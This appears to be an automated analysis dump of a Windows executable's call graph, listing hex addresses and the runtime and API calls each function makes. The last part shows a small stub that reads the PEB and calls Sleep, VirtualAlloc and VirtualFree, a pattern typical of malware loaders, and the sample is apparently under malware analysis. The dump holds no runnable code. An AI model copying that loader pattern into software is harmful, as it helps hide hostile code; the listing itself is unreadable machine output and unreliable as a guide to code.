94707 9a3ab7 _wprintf 94707->94693 94708->94700 94709->94707 94711 9a4e4e EnterCriticalSection 94710->94711 94712 9a4e2c 94710->94712 94713 9a4e44 94711->94713 94712->94711 94714 9a4e34 94712->94714 94713->94703 94715 9a7cf4 __lock 47 API calls 94714->94715 94715->94713 94716->94705 94717->94707 94721 9a3839 94718->94721 94720 984510 94720->94580 94722 9a3845 _wprintf 94721->94722 94723 9a385b _memset 94722->94723 94724 9a3888 94722->94724 94725 9a3880 _wprintf 94722->94725 94734 9a7c0e 47 API calls __getptd_noexit 94723->94734 94726 9a4e1c __lock_file 48 API calls 94724->94726 94725->94720 94727 9a388e 94726->94727 94736 9a365b 62 API calls 6 library calls 94727->94736 94730 9a3875 94735 9a6e10 8 API calls _wprintf 94730->94735 94731 9a38a4 94737 9a38c2 LeaveCriticalSection LeaveCriticalSection _fseek 94731->94737 94734->94730 94735->94725 94736->94731 94737->94725 94741 9a344a GetSystemTimeAsFileTime 94738->94741 94740 9cbdc3 94740->94582 94742 9a3478 __aulldiv 94741->94742 94742->94740 94744 9a3e71 _wprintf 94743->94744 94745 9a3e7f 94744->94745 94746 9a3e94 94744->94746 94757 9a7c0e 47 API calls __getptd_noexit 94745->94757 94748 9a4e1c __lock_file 48 API calls 94746->94748 94750 9a3e9a 94748->94750 94749 9a3e84 94758 9a6e10 8 API calls _wprintf 94749->94758 94759 9a3b0c 55 API calls 6 library calls 94750->94759 94753 9a3ea5 94760 9a3ec5 LeaveCriticalSection LeaveCriticalSection _fseek 94753->94760 94755 9a3eb7 94756 9a3e8f _wprintf 94755->94756 94756->94587 94757->94749 94758->94756 94759->94753 94760->94755 94766 9cc581 __tzset_nolock _wcscmp 94761->94766 94762 9cc417 94762->94503 94762->94531 94763 9844ed 64 API calls 94763->94766 94764 9cbf5a GetSystemTimeAsFileTime 94764->94766 94765 984517 83 API calls 94765->94766 94766->94762 94766->94763 94766->94764 94766->94765 94767->94530 94769 9a35f0 _wprintf 94768->94769 94770 9a361c 94769->94770 94771 9a3604 94769->94771 94774 9a4e1c __lock_file 48 API calls 94770->94774 94776 9a3614 _wprintf 94770->94776 94797 9a7c0e 47 API calls __getptd_noexit 94771->94797 94773 9a3609 94798 9a6e10 8 API calls _wprintf 94773->94798 94777 9a362e 94774->94777 94776->94535 94781 9a3578 94777->94781 94782 9a359b 94781->94782 94783 9a3587 94781->94783 94789 9a3597 94782->94789 94800 9a2c84 94782->94800 94840 9a7c0e 47 API calls __getptd_noexit 94783->94840 94785 9a358c 94841 9a6e10 8 API calls _wprintf 94785->94841 94799 9a3653 LeaveCriticalSection LeaveCriticalSection _fseek 94789->94799 94793 9a35b5 94817 9ae9d2 94793->94817 94795 9a35bb 94795->94789 94796 9a1c9d _free 47 API calls 94795->94796 94796->94789 94797->94773 94798->94776 94799->94776 94801 9a2c97 94800->94801 94805 9a2cbb 94800->94805 94802 9a2933 __flswbuf 47 API calls 94801->94802 94801->94805 94803 9a2cb4 94802->94803 94842 9aaf61 94803->94842 94806 9aeb36 94805->94806 94807 9a35af 94806->94807 94808 9aeb43 94806->94808 94810 9a2933 94807->94810 94808->94807 94809 9a1c9d _free 47 API calls 94808->94809 94809->94807 94811 9a293d 94810->94811 94812 9a2952 94810->94812 94948 9a7c0e 47 API calls __getptd_noexit 94811->94948 94812->94793 94814 9a2942 94949 9a6e10 8 API calls _wprintf 94814->94949 94816 9a294d 94816->94793 94818 9ae9de _wprintf 94817->94818 94819 9ae9fe 94818->94819 94820 9ae9e6 94818->94820 94822 9aea7b 94819->94822 94827 9aea28 94819->94827 94965 9a7bda 47 API calls __getptd_noexit 94820->94965 94969 9a7bda 47 API calls __getptd_noexit 94822->94969 94823 9ae9eb 94966 9a7c0e 47 API calls __getptd_noexit 94823->94966 94826 9aea80 94970 9a7c0e 47 API calls __getptd_noexit 94826->94970 94830 9aa8ed ___lock_fhandle 49 API calls 94827->94830 94828 9ae9f3 _wprintf 94828->94795 94832 9aea2e 94830->94832 94831 9aea88 94971 9a6e10 8 API calls _wprintf 94831->94971 94834 9aea4c 94832->94834 94835 9aea41 94832->94835 94967 9a7c0e 47 API calls __getptd_noexit 94834->94967 94950 9aea9c 94835->94950 94838 9aea47 94968 9aea73 LeaveCriticalSection __unlock_fhandle 94838->94968 94840->94785 94841->94789 94843 9aaf6d _wprintf 94842->94843 94844 9aaf8d 94843->94844 94845 9aaf75 94843->94845 94847 9ab022 94844->94847 94852 9aafbf 94844->94852 94940 9a7bda 47 API calls __getptd_noexit 94845->94940 94945 9a7bda 47 API calls __getptd_noexit 94847->94945 94848 9aaf7a 94941 9a7c0e 47 API calls __getptd_noexit 94848->94941 94851 9ab027 94946 9a7c0e 47 API calls __getptd_noexit 94851->94946 94867 9aa8ed 94852->94867 94855 9ab02f 94947 9a6e10 8 API calls _wprintf 94855->94947 94856 9aafc5 94858 9aafeb 94856->94858 94859 9aafd8 94856->94859 94942 9a7c0e 47 API calls __getptd_noexit 94858->94942 94876 9ab043 94859->94876 94861 9aaf82 _wprintf 94861->94805 94863 9aafe4 94944 9ab01a LeaveCriticalSection __unlock_fhandle 94863->94944 94864 9aaff0 94943 9a7bda 47 API calls __getptd_noexit 94864->94943 94868 9aa8f9 _wprintf 94867->94868 94869 9aa946 EnterCriticalSection 94868->94869 94870 9a7cf4 __lock 47 API calls 94868->94870 94871 9aa96c _wprintf 94869->94871 94872 9aa91d 94870->94872 94871->94856 94873 9aa93a 94872->94873 94874 9aa928 InitializeCriticalSectionAndSpinCount 94872->94874 94875 9aa970 ___lock_fhandle LeaveCriticalSection 94873->94875 94874->94873 94875->94869 94877 9ab050 __ftell_nolock 94876->94877 94878 9ab0ac 94877->94878 94879 9ab08d 94877->94879 94924 9ab082 94877->94924 94884 9ab105 94878->94884 94885 9ab0e9 94878->94885 94881 9a7bda __lseeki64 47 API calls 94879->94881 94880 9aa70c __except_handler4 6 API calls 94882 9ab86b 94880->94882 94883 9ab092 94881->94883 94882->94863 94886 9a7c0e _wprintf 47 API calls 94883->94886 94887 9ab11c 94884->94887 94891 9af82f __lseeki64_nolock 49 API calls 94884->94891 94888 9a7bda __lseeki64 47 API calls 94885->94888 94890 9ab099 94886->94890 94892 9b3bf2 __flswbuf 47 API calls 94887->94892 94889 9ab0ee 94888->94889 94893 9a7c0e _wprintf 47 API calls 94889->94893 94894 9a6e10 _wprintf 8 API calls 94890->94894 94891->94887 94895 9ab12a 94892->94895 94896 9ab0f5 94893->94896 94894->94924 94897 9ab44b 94895->94897 94904 9a7a0d __setmbcp 47 API calls 94895->94904 94900 9a6e10 _wprintf 8 API calls 94896->94900 94898 9ab7b8 WriteFile 94897->94898 94899 9ab463 94897->94899 94903 9ab7e1 GetLastError 94898->94903 94935 9ab410 94898->94935 94901 9ab55a 94899->94901 94902 9ab479 94899->94902 94900->94924 94919 9ab565 94901->94919 94923 9ab663 94901->94923 94906 9ab81b 94902->94906 94909 9ab4e9 WriteFile 94902->94909 94903->94935 94905 9ab150 GetConsoleMode 94904->94905 94905->94897 94907 9ab189 94905->94907 94910 9a7c0e _wprintf 47 API calls 94906->94910 94906->94924 94907->94897 94908 9ab199 GetConsoleCP 94907->94908 94934 9ab1c2 94908->94934 94908->94935 94909->94903 94911 9ab526 94909->94911 94912 9ab843 94910->94912 94911->94902 94922 9ab555 94911->94922 94911->94935 94916 9a7bda __lseeki64 47 API calls 94912->94916 94913 9ab7f7 94917 9ab7fe 94913->94917 94918 9ab812 94913->94918 94914 9ab5de WriteFile 94914->94903 94920 9ab62d 94914->94920 94915 9ab6d8 WideCharToMultiByte 94915->94903 94931 9ab71f 94915->94931 94916->94924 94925 9a7c0e _wprintf 47 API calls 94917->94925 94921 9a7bed __dosmaperr 47 API calls 94918->94921 94919->94906 94919->94914 94920->94919 94920->94922 94920->94935 94921->94924 94922->94935 94923->94906 94923->94915 94924->94880 94927 9ab803 94925->94927 94926 9ab727 WriteFile 94928 9ab77a GetLastError 94926->94928 94926->94931 94929 9a7bda __lseeki64 47 API calls 94927->94929 94928->94931 94929->94924 94930 9a1688 __chsize_nolock 57 API calls 94930->94934 94931->94922 94931->94923 94931->94926 94931->94935 94932 9b40f7 59 API calls __chsize_nolock 94932->94934 94933 9b5884 WriteConsoleW CreateFileW __chsize_nolock 94937 9ab2f6 94933->94937 94934->94930 94934->94932 94934->94935 94936 9ab28f WideCharToMultiByte 94934->94936 94934->94937 94935->94906 94935->94913 94935->94924 94936->94935 94938 9ab2ca WriteFile 94936->94938 94937->94903 94937->94933 94937->94934 94937->94935 94939 9ab321 WriteFile 94937->94939 94938->94903 94938->94937 94939->94903 94939->94937 94940->94848 94941->94861 94942->94864 94943->94863 94944->94861 94945->94851 94946->94855 94947->94861 94948->94814 94949->94816 94972 9aaba4 94950->94972 94952 9aeb00 94985 9aab1e 48 API calls 2 library calls 94952->94985 94954 9aeaaa 94954->94952 94955 9aeade 94954->94955 94958 9aaba4 __lseeki64_nolock 47 API calls 94954->94958 94955->94952 94956 9aaba4 __lseeki64_nolock 47 API calls 94955->94956 94959 9aeaea CloseHandle 94956->94959 94957 9aeb08 94960 9aeb2a 94957->94960 94986 9a7bed 47 API calls 3 library calls 94957->94986 94961 9aead5 94958->94961 94959->94952 94962 9aeaf6 GetLastError 94959->94962 94960->94838 94964 9aaba4 __lseeki64_nolock 47 API calls 94961->94964 94962->94952 94964->94955 94965->94823 94966->94828 94967->94838 94968->94828 94969->94826 94970->94831 94971->94828 94973 9aabaf 94972->94973 94974 9aabc4 94972->94974 94975 9a7bda __lseeki64 47 API calls 94973->94975 94977 9a7bda __lseeki64 47 API calls 94974->94977 94979 9aabe9 94974->94979 94976 9aabb4 94975->94976 94978 9a7c0e _wprintf 47 API calls 94976->94978 94980 9aabf3 94977->94980 94981 9aabbc 94978->94981 94979->94954 94982 9a7c0e _wprintf 47 API calls 94980->94982 94981->94954 94983 9aabfb 94982->94983 94984 9a6e10 _wprintf 8 API calls 94983->94984 94984->94981 94985->94957 94986->94960 94987->94415 94988->94425 94989->94425 94990->94426 94991->94439 94992->94441 94993->94438 94994->94444 94995->94451 94996->94465 94997->94461 94999 9af8a0 __ftell_nolock 94998->94999 95000 9840b4 GetLongPathNameW 94999->95000 95001 986a63 48 API calls 95000->95001 95002 9840dc 95001->95002 95003 9849a0 95002->95003 95004 98d7f7 48 API calls 95003->95004 95005 9849b2 95004->95005 95006 98660f 49 API calls 95005->95006 95007 9849bd 95006->95007 95008 9849c8 95007->95008 95009 9f2e35 95007->95009 95011 9864cf 48 API calls 95008->95011 95013 9f2e4f 95009->95013 95056 99d35e 60 API calls 95009->95056 95012 9849d4 95011->95012 95050 9828a6 95012->95050 95015 9849e7 Mailbox 95015->94280 95017 9841a9 136 API calls 95016->95017 95018 98415e 95017->95018 95019 9f3489 95018->95019 95020 9841a9 136 API calls 95018->95020 95021 9cc396 122 API calls 95019->95021 95022 984172 95020->95022 95023 9f349e 95021->95023 95022->95019 95024 98417a 95022->95024 95025 9f34bf 95023->95025 95026 9f34a2 95023->95026 95029 9f34aa 95024->95029 95030 984186 95024->95030 95028 99f4ea 48 API calls 95025->95028 95027 984252 84 API calls 95026->95027 95027->95029 95049 9f3504 Mailbox 95028->95049 95159 9c6b49 87 API calls _wprintf 95029->95159 95057 98c833 95030->95057 95033 9f34b8 95033->95025 95035 9f36b4 95036 9a1c9d _free 47 API calls 95035->95036 95037 9f36bc 95036->95037 95038 984252 84 API calls 95037->95038 95043 9f36c5 95038->95043 95042 9a1c9d _free 47 API calls 95042->95043 95043->95042 95045 984252 84 API calls 95043->95045 95163 9c25b5 86 API calls 4 library calls 95043->95163 95045->95043 95046 98ce19 48 API calls 95046->95049 95049->95035 95049->95043 95049->95046 95145 98ba85 95049->95145 95153 984dd9 95049->95153 95160 9c2551 48 API calls _memcpy_s 95049->95160 95161 9c2472 60 API calls 2 library calls 95049->95161 95162 9c9c12 48 API calls 95049->95162 95051 9828b8 95050->95051 95055 9828d7 _memcpy_s 95050->95055 95054 99f4ea 48 API calls 95051->95054 95052 99f4ea 48 API calls 95053 9828ee 95052->95053 95053->95015 95054->95055 95055->95052 95056->95009 95058 98c843 __ftell_nolock 95057->95058 95059 98c860 95058->95059 95060 9f3095 95058->95060 95169 9848ba 49 API calls 95059->95169 95188 9c25b5 86 API calls 4 library calls 95060->95188 95063 9f30a8 95189 9c25b5 86 API calls 4 library calls 95063->95189 95064 98c882 95170 984550 56 API calls 95064->95170 95066 98c897 95066->95063 95067 98c89f 95066->95067 95069 98d7f7 48 API calls 95067->95069 95071 98c8ab 95069->95071 95070 9f30c4 95072 98c90c 95070->95072 95171 99e968 49 API calls __ftell_nolock 95071->95171 95074 98c91a 95072->95074 95075 9f30d7 95072->95075 95174 9a1dfc 95074->95174 95077 984907 CloseHandle 95075->95077 95076 98c8b7 95078 98d7f7 48 API calls 95076->95078 95080 9f30e3 95077->95080 95081 98c8c3 95078->95081 95082 9841a9 136 API calls 95080->95082 95083 98660f 49 API calls 95081->95083 95084 9f310d 95082->95084 95085 98c8d1 95083->95085 95087 9f3136 95084->95087 95090 9cc396 122 API calls 95084->95090 95172 99eb66 SetFilePointerEx ReadFile 95085->95172 95086 98c943 _wcscat _wcscpy 95089 98c96d SetCurrentDirectoryW 95086->95089 95190 9c25b5 86 API calls 4 library calls 95087->95190 95093 99f4ea 48 API calls 95089->95093 95094 9f3129 95090->95094 95091 98c8fd 95173 9846ce SetFilePointerEx SetFilePointerEx 95091->95173 95097 98c988 95093->95097 95098 9f3152 95094->95098 95099 9f3131 95094->95099 95096 9f314d 95105 98cad1 Mailbox 95096->95105 95100 9847b7 48 API calls 95097->95100 95102 984252 84 API calls 95098->95102 95101 984252 84 API calls 95099->95101 95117 98c993 Mailbox __NMSG_WRITE 95100->95117 95101->95087 95103 9f3157 95102->95103 95104 99f4ea 48 API calls 95103->95104 95112 9f3194 95104->95112 95164 9848dd 95105->95164 95106 98ca9d 95184 984907 95106->95184 95110 983d98 95110->94146 95110->94155 95111 98caa9 SetCurrentDirectoryW 95111->95105 95114 98ba85 48 API calls 95112->95114 95141 9f31dd Mailbox 95114->95141 95116 9f33ce 95195 9c9b72 48 API calls 95116->95195 95117->95106 95127 9f345f 95117->95127 95129 98ce19 48 API calls 95117->95129 95130 9f3467 95117->95130 95177 98b337 56 API calls _wcscpy 95117->95177 95178 99c258 GetStringTypeW 95117->95178 95179 98cb93 59 API calls __wcsnicmp 95117->95179 95180 98cb5a GetStringTypeW __NMSG_WRITE 95117->95180 95181 9a16d0 GetStringTypeW wcstoxq 95117->95181 95182 98cc24 162 API calls 3 library calls 95117->95182 95183 99c682 48 API calls 95117->95183 95120 9f3480 95120->95106 95122 9f33f0 95196 9e29e8 48 API calls _memcpy_s 95122->95196 95124 9f33fd 95125 9a1c9d _free 47 API calls 95124->95125 95125->95105 95198 9c240b 48 API calls 3 library calls 95127->95198 95129->95117 95199 9c25b5 86 API calls 4 library calls 95130->95199 95131 98ba85 48 API calls 95131->95141 95136 98ce19 48 API calls 95136->95141 95139 9f3420 95197 9c25b5 86 API calls 4 library calls 95139->95197 95141->95116 95141->95131 95141->95136 95141->95139 95191 9c2551 48 API calls _memcpy_s 95141->95191 95192 9c2472 60 API calls 2 library calls 95141->95192 95193 9c9c12 48 API calls 95141->95193 95194 99c682 48 API calls 95141->95194 95142 9f3439 95143 9a1c9d _free 47 API calls 95142->95143 95144 9f344c 95143->95144 95144->95105 95146 98ba98 _memcpy_s 95145->95146 95147 98bb25 95145->95147 95148 99f4ea 48 API calls 95146->95148 95149 99f4ea 48 API calls 95147->95149 95151 98ba9f 95148->95151 95149->95146 95150 98bac8 95150->95049 95151->95150 95152 99f4ea 48 API calls 95151->95152 95152->95150 95154 984dec 95153->95154 95157 984e9a 95153->95157 95156 99f4ea 48 API calls 95154->95156 95158 984e1e 95154->95158 95155 99f4ea 48 API calls 95155->95158 95156->95158 95157->95049 95158->95155 95158->95157 95159->95033 95160->95049 95161->95049 95162->95049 95163->95043 95165 984907 CloseHandle 95164->95165 95166 9848e5 Mailbox 95165->95166 95167 984907 CloseHandle 95166->95167 95168 9848fc 95167->95168 95168->95110 95169->95064 95170->95066 95171->95076 95172->95091 95173->95072 95200 9a1e46 95174->95200 95177->95117 95178->95117 95179->95117 95180->95117 95181->95117 95182->95117 95183->95117 95185 984920 95184->95185 95186 984911 95184->95186 95185->95186 95187 984925 CloseHandle 95185->95187 95186->95111 95187->95186 95188->95063 95189->95070 95190->95096 95191->95141 95192->95141 95193->95141 95194->95141 95195->95122 95196->95124 95197->95142 95198->95130 95199->95120 95201 9a1e61 95200->95201 95204 9a1e55 95200->95204 95224 9a7c0e 47 API calls __getptd_noexit 95201->95224 95203 9a2019 95206 9a1e41 95203->95206 95225 9a6e10 8 API calls _wprintf 95203->95225 95204->95201 95212 9a1ed4 95204->95212 95219 9a9d6b 47 API calls _wprintf 95204->95219 95206->95086 95208 9a1fa0 95208->95201 95208->95206 95210 9a1fb0 95208->95210 95209 9a1f5f 95209->95201 95211 9a1f7b 95209->95211 95221 9a9d6b 47 API calls _wprintf 95209->95221 95223 9a9d6b 47 API calls _wprintf 95210->95223 95211->95201 95211->95206 95216 9a1f91 95211->95216 95212->95201 95213 9a1f41 95212->95213 95220 9a9d6b 47 API calls _wprintf 95212->95220 95213->95208 95213->95209 95222 9a9d6b 47 API calls _wprintf 95216->95222 95219->95212 95220->95213 95221->95211 95222->95206 95223->95206 95224->95203 95225->95206 95227 984c8b 95226->95227 95228 984d94 95226->95228 95227->95228 95229 99f4ea 48 API calls 95227->95229 95228->94286 95230 984cb2 95229->95230 95231 99f4ea 48 API calls 95230->95231 95236 984d22 95231->95236 95234 984dd9 48 API calls 95234->95236 95235 98ba85 48 API calls 95235->95236 95236->95228 95236->95234 95236->95235 95239 98b470 95236->95239 95267 9c9af1 48 API calls 95236->95267 95237->94288 95238->94290 95268 986b0f 95239->95268 95241 98b69b 95242 98ba85 48 API calls 95241->95242 95243 98b6b5 Mailbox 95242->95243 95243->95236 95246 98bcce 48 API calls 95258 98b495 95246->95258 95247 9f397b 95278 9c26bc 88 API calls 4 library calls 95247->95278 95250 98b9e4 95279 9c26bc 88 API calls 4 library calls 95250->95279 95251 9f3973 95251->95243 95253 98ba85 48 API calls 95253->95258 95255 9f3989 95256 98ba85 48 API calls 95255->95256 95256->95251 95257 9f3909 95260 986b4a 48 API calls 95257->95260 95258->95241 95258->95246 95258->95247 95258->95250 95258->95253 95258->95257 95259 98bb85 48 API calls 95258->95259 95263 98bdfa 48 API calls 95258->95263 95266 9f3939 _memcpy_s 95258->95266 95273 98c413 59 API calls 95258->95273 95274 98bc74 48 API calls 95258->95274 95275 98c6a5 49 API calls 95258->95275 95276 98c799 48 API calls _memcpy_s 95258->95276 95259->95258 95262 9f3914 95260->95262 95265 99f4ea 48 API calls 95262->95265 95264 98b66c CharUpperBuffW 95263->95264 95264->95258 95265->95266 95277 9c26bc 88 API calls 4 library calls 95266->95277 95267->95236 95269 99f4ea 48 API calls 95268->95269 95270 986b34 95269->95270 95271 986b4a 48 API calls 95270->95271 95272 986b43 95271->95272 95272->95258 95273->95258 95274->95258 95275->95258 95276->95258 95277->95251 95278->95255 95279->95251 95281 9f418d EnumResourceNamesW 95280->95281 95282 98403c LoadImageW 95280->95282 95283 983ee1 RegisterClassExW 95281->95283 95282->95283 95284 983f53 7 API calls 95283->95284 95284->94305 95286 9f3c33 95285->95286 95287 984c44 95285->95287 95286->95287 95288 9f3c3c DestroyIcon 95286->95288 95287->94314 95311 9c5819 61 API calls _W_store_winword 95287->95311 95288->95287 95290 9851cb 95289->95290 95291 9852a2 Mailbox 95289->95291 95292 986b0f 48 API calls 95290->95292 95291->94316 95293 9851d9 95292->95293 95294 9f3ca1 LoadStringW 95293->95294 95295 9851e6 95293->95295 95297 9f3cbb 95294->95297 95296 986a63 48 API calls 95295->95296 95298 9851fb 95296->95298 95299 98510d 48 API calls 95297->95299 95298->95297 95300 98520c 95298->95300 95305 9f3cc5 95299->95305 95301 985216 95300->95301 95302 9852a7 95300->95302 95303 98510d 48 API calls 95301->95303 95304 986eed 48 API calls 95302->95304 95307 985220 _memset _wcscpy 95303->95307 95304->95307 95306 98518c 48 API calls 95305->95306 95305->95307 95308 9f3ce7 95306->95308 95309 985288 Shell_NotifyIconW 95307->95309 95309->95291 95311->94314 95313 98ef1d 95312->95313 95314 98ef2f 95312->95314 95478 98e3b0 331 API calls 2 library calls 95313->95478 95479 9ccc5c 86 API calls 4 library calls 95314->95479 95316 98ef26 95316->94350 95318 9f86f9 95318->95318 95320 98f130 95319->95320 95323 98fe30 331 API calls 95320->95323 95325 98f199 95320->95325 95321 98f3dd 95324 9f87c8 95321->95324 95334 98f3f2 95321->95334 95365 98f431 Mailbox 95321->95365 95322 98f595 95330 98d7f7 48 API calls 95322->95330 95322->95365 95326 9f8728 95323->95326 95484 9ccc5c 86 API calls 4 library calls 95324->95484 95325->95321 95325->95322 95332 98d7f7 48 API calls 95325->95332 95369 98f229 95325->95369 95326->95325 95481 9ccc5c 86 API calls 4 library calls 95326->95481 95327 98fe30 331 API calls 95327->95365 95331 9f87a3 95330->95331 95483 9a0f0a 52 API calls __cinit 95331->95483 95336 9f8772 95332->95336 95360 98f418 95334->95360 95485 9c9af1 48 API calls 95334->95485 95335 9f8b1b 95350 9f8bcf 95335->95350 95351 9f8b2c 95335->95351 95482 9a0f0a 52 API calls __cinit 95336->95482 95337 98d6e9 55 API calls 95337->95365 95339 98f770 95343 9f8a45 95339->95343 95361 98f77a 95339->95361 95341 9f8c53 95499 9ccc5c 86 API calls 4 library calls 95341->95499 95342 9f8810 95486 9deef8 331 API calls 95342->95486 95491 99c1af 48 API calls 95343->95491 95344 98fe30 331 API calls 95363 98f6aa 95344->95363 95345 9ccc5c 86 API calls 95345->95365 95346 9f8b7e 95494 9de40a 331 API calls Mailbox 95346->95494 95496 9ccc5c 86 API calls 4 library calls 95350->95496 95493 9df5ee 331 API calls 95351->95493 95352 9f8beb 95497 9dbdbd 331 API calls Mailbox 95352->95497 95355 991b90 48 API calls 95355->95365 95356 991b90 48 API calls 95356->95365 95360->95335 95360->95363 95360->95365 95361->95356 95362 9f8c00 95383 98f537 Mailbox 95362->95383 95498 9ccc5c 86 API calls 4 library calls 95362->95498 95363->95339 95363->95344 95363->95365 95366 98fce0 95363->95366 95363->95383 95364 9f8823 95364->95360 95368 9f884b 95364->95368 95365->95327 95365->95337 95365->95341 95365->95345 95365->95346 95365->95352 95365->95355 95365->95366 95365->95383 95480 98dd47 48 API calls _memcpy_s 95365->95480 95492 9b97ed InterlockedDecrement 95365->95492 95500 99c1af 48 API calls 95365->95500 95366->95383 95495 9ccc5c 86 API calls 4 library calls 95366->95495 95487 9dccdc 48 API calls 95368->95487 95369->95321 95369->95322 95369->95360 95369->95365 95373 9f8857 95375 9f8865 95373->95375 95376 9f88aa 95373->95376 95383->94350 95385 99479f 95384->95385 95386 994637 95384->95386 95387 98ce19 48 API calls 95385->95387 95388 9f6e05 95386->95388 95389 994643 95386->95389 95396 9946e4 Mailbox 95387->95396 95555 9de822 95388->95555 95554 994300 331 API calls _memcpy_s 95389->95554 95392 994739 Mailbox 95392->94350 95393 9f6e11 95393->95392 95595 9ccc5c 86 API calls 4 library calls 95393->95595 95395 994659 95395->95392 95395->95393 95395->95396 95399 984252 84 API calls 95396->95399 95501 9cfa0c 95396->95501 95542 9c6524 95396->95542 95545 9d6ff0 95396->95545 95399->95392 95402 9fdf42 95401->95402 95403 99e253 95401->95403 95404 9fdf77 95402->95404 95405 9fdf59 TranslateAcceleratorW 95402->95405 95403->94350 95405->95403 95407 99dca3 95406->95407 95408 99dc71 95406->95408 95407->94350 95408->95407 95409 99dc96 IsDialogMessageW 95408->95409 95410 9fdd1d GetClassLongW 95408->95410 95409->95407 95409->95408 95410->95408 95410->95409 95411->94350 95704 98bd30 95412->95704 95414 993267 95415 993313 _memcpy_s Mailbox 95414->95415 95716 99c36b 86 API calls 95414->95716 95417 99c3c3 48 API calls 95415->95417 95420 98d645 53 API calls 95415->95420 95424 98d6e9 55 API calls 95415->95424 95427 98fe30 331 API calls 95415->95427 95428 9ccc5c 86 API calls 95415->95428 95431 98e8d0 331 API calls 95415->95431 95432 99c2d6 48 API calls 95415->95432 95433 986eed 48 API calls 95415->95433 95435 99f4ea 48 API calls 95415->95435 95436 98dcae 50 API calls 95415->95436 95437 993635 Mailbox 95415->95437 95709 982b7a 95415->95709 95717 98d9a0 53 API calls __cinit 95415->95717 95718 98d8c0 53 API calls 95415->95718 95719 9df320 331 API calls 95415->95719 95720 9df5ee 331 API calls 95415->95720 95721 981caa 49 API calls 95415->95721 95722 9dcda2 82 API calls Mailbox 95415->95722 95723 9c80e3 53 API calls 95415->95723 95724 98d764 55 API calls 95415->95724 95725 9cc942 50 API calls 95415->95725 95417->95415 95420->95415 95424->95415 95427->95415 95428->95415 95431->95415 95432->95415 95433->95415 95435->95415 95436->95415 95437->94350 95438->94332 95439->94324 95440->94328 95441->94350 95442->94350 95443->94368 95444->94368 95445->94368 95447 98fe50 95446->95447 95472 98fe7e 95446->95472 95448 99f4ea 48 API calls 95447->95448 95448->95472 95449 99146e 95450 986eed 48 API calls 95449->95450 95470 98ffe1 95450->95470 95451 99f4ea 48 API calls 95451->95472 95452 990509 95732 9ccc5c 86 API calls 4 library calls 95452->95732 95455 9a0f0a 52 API calls __cinit 95455->95472 95457 9fa922 95457->94350 95458 9fa246 95461 986eed 48 API calls 95458->95461 95459 991473 95731 9ccc5c 86 API calls 4 library calls 95459->95731 95460 986eed 48 API calls 95460->95472 95461->95470 95464 98d7f7 48 API calls 95464->95472 95465 9fa873 95465->94350 95466 9fa30e 95466->95470 95729 9b97ed InterlockedDecrement 95466->95729 95467 9b97ed InterlockedDecrement 95467->95472 95469 9fa973 95733 9ccc5c 86 API calls 4 library calls 95469->95733 95470->94350 95472->95449 95472->95451 95472->95452 95472->95455 95472->95458 95472->95459 95472->95460 95472->95464 95472->95466 95472->95467 95472->95469 95472->95470 95474 9915b5 95472->95474 95727 991820 331 API calls 2 library calls 95472->95727 95728 991d10 59 API calls Mailbox 95472->95728 95473 9fa982 95730 9ccc5c 86 API calls 4 library calls 95474->95730 95475->94368 95476->94368 95477->94368 95478->95316 95479->95318 95480->95365 95481->95325 95482->95369 95483->95365 95484->95383 95485->95342 95486->95364 95487->95373 95491->95365 95492->95365 95493->95365 95494->95366 95495->95383 95496->95383 95497->95362 95498->95383 95499->95383 95500->95365 95502 9cfa1c __ftell_nolock 95501->95502 95503 9cfa44 95502->95503 95652 98d286 48 API calls 95502->95652 95505 98936c 81 API calls 95503->95505 95507 9cfa5e 95505->95507 95506 9cfb92 95506->95392 95507->95506 95508 9cfb68 95507->95508 95509 9cfa80 95507->95509 95510 9841a9 136 API calls 95508->95510 95511 98936c 81 API calls 95509->95511 95512 9cfb79 95510->95512 95517 9cfa8c _wcscpy _wcschr 95511->95517 95513 9cfb8e 95512->95513 95515 9841a9 136 API calls 95512->95515 95513->95506 95515->95513 95521 9cfab0 _wcscat _wcscpy 95517->95521 95525 9cfade _wcscat 95517->95525 95522 98936c 81 API calls 95521->95522 95522->95525 95691 9c6ca9 GetFileAttributesW 95542->95691 95546 98936c 81 API calls 95545->95546 95547 9d702a 95546->95547 95548 98b470 91 API calls 95547->95548 95549 9d703a 95548->95549 95550 9d705f 95549->95550 95551 98fe30 331 API calls 95549->95551 95553 9d7063 95550->95553 95695 98cdb9 48 API calls 95550->95695 95551->95550 95553->95392 95554->95395 95556 9de84e 95555->95556 95557 9de868 95555->95557 95696 9ccc5c 86 API calls 4 library calls 95556->95696 95697 9dccdc 48 API calls 95557->95697 95560 9de871 95561 98fe30 330 API calls 95560->95561 95562 9de8cf 95561->95562 95563 9de96a 95562->95563 95565 9de916 95562->95565 95594 9de860 Mailbox 95562->95594 95564 9de978 95563->95564 95567 9de9c7 95563->95567 95699 9ca69d 48 API calls 95564->95699 95698 9c9b72 48 API calls 95565->95698 95570 98936c 81 API calls 95567->95570 95567->95594 95569 9de949 95572 9945e0 330 API calls 95569->95572 95573 9de9e1 95570->95573 95571 9de99b 95572->95594 95594->95393 95595->95392 95652->95503 95692 9c6529 95691->95692 95693 9c6cc4 FindFirstFileW 95691->95693 95692->95392 95693->95692 95694 9c6cd9 FindClose 95693->95694 95694->95692 95695->95553 95696->95594 95697->95560 95698->95569 95699->95571 95705 98bd3f 95704->95705 95708 98bd5a 95704->95708 95706 98bdfa 48 API calls 95705->95706 95707 98bd47 CharUpperBuffW 95706->95707 95707->95708 95708->95414 95710 982b8b 95709->95710 95711 9f436a 95709->95711 95712 99f4ea 48 API calls 95710->95712 95713 982b92 95712->95713 95714 982bb3 95713->95714 95726 982bce 48 API calls 95713->95726 95714->95415 95716->95415 95717->95415 95718->95415 95719->95415 95720->95415 95721->95415 95722->95415 95723->95415 95724->95415 95725->95415 95726->95714 95727->95472 95728->95472 95729->95470 95730->95470 95731->95465 95732->95457 95733->95473 95734 1273cc0 95748 1271910 95734->95748 95736 1273dc8 95751 1273bb0 95736->95751 95750 1271f9b 95748->95750 95754 1274e00 GetPEB 95748->95754 95750->95736 95752 1273bb9 Sleep 95751->95752 95753 1273bc7 95752->95753 95754->95750 95755 127426b 95756 1274280 95755->95756 95757 1271910 GetPEB 95756->95757 95758 127428c 95757->95758 95759 1274340 95758->95759 95760 12742aa 95758->95760 95777 1274bf0 9 API calls 95759->95777 95764 1273f50 95760->95764 95763 1274327 95765 1271910 GetPEB 95764->95765 95766 1273fef 95765->95766 95769 1274049 VirtualAlloc 95766->95769 95771 127402d 95766->95771 95775 1274150 CloseHandle 95766->95775 95776 1274160 VirtualFree 